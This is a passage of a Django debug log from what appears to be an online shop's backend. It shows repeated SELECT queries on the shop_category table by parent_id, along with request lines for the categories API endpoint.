args=(26,) DEBUG 2019-12-27 07:51:33,937 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-27 07:51:33,939 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-27 07:51:33,941 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-27 07:51:33,943 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-27 07:51:33,947 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-27 07:51:33,949 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-27 07:51:33,951 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-27 07:51:33,953 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-27 07:51:33,957 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-27 07:51:33,960 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-27 07:51:33,962 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-27 07:51:33,965 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-27 07:51:33,968 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-27 07:51:33,970 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-27 07:51:33,972 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-27 07:51:33,975 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-27 07:51:33,977 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-27 07:51:33,979 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-27 07:51:33,982 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-27 07:51:33,984 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [27/Dec/2019 07:51:33] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [27/Dec/2019 07:51:41] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-27 07:51:45,410 utils 32506 139738707130112 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-27 07:51:45,418 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-27 07:51:45,421 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-27 07:51:45,423 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 07:51:45,427 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-27 07:51:45,429 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-27 07:51:45,431 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-27 07:51:45,434 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-27 07:51:45,438 utils 32506 139738707130112 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-27 07:51:45,441 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-27 07:51:45,444 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-27 07:51:45,446 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-27 07:51:45,448 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-27 07:51:45,450 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-27 07:51:45,454 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-27 07:51:45,456 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-27 07:51:45,458 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-27 07:51:45,461 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-27 07:51:45,463 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-27 07:51:45,467 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-27 07:51:45,469 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-27 07:51:45,471 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-27 07:51:45,474 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-27 07:51:45,476 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-27 07:51:45,478 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-27 07:51:45,482 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-27 07:51:45,484 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-27 07:51:45,486 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-27 07:51:45,488 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-27 07:51:45,491 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-27 07:51:45,494 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-27 07:51:45,496 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-27 07:51:45,499 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-27 07:51:45,502 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-27 07:51:45,504 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-27 07:51:45,508 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-27 07:51:45,510 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-27 07:51:45,512 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-27 07:51:45,514 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-27 07:51:45,517 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-27 07:51:45,519 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-27 07:51:45,522 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-27 07:51:45,524 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-27 07:51:45,526 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-27 07:51:45,530 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-27 07:51:45,533 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [27/Dec/2019 07:51:45] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-27 07:51:47,907 utils 32506 139738707130112 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-27 07:51:47,913 utils 32506 139738707130112 (0.001) SELECT 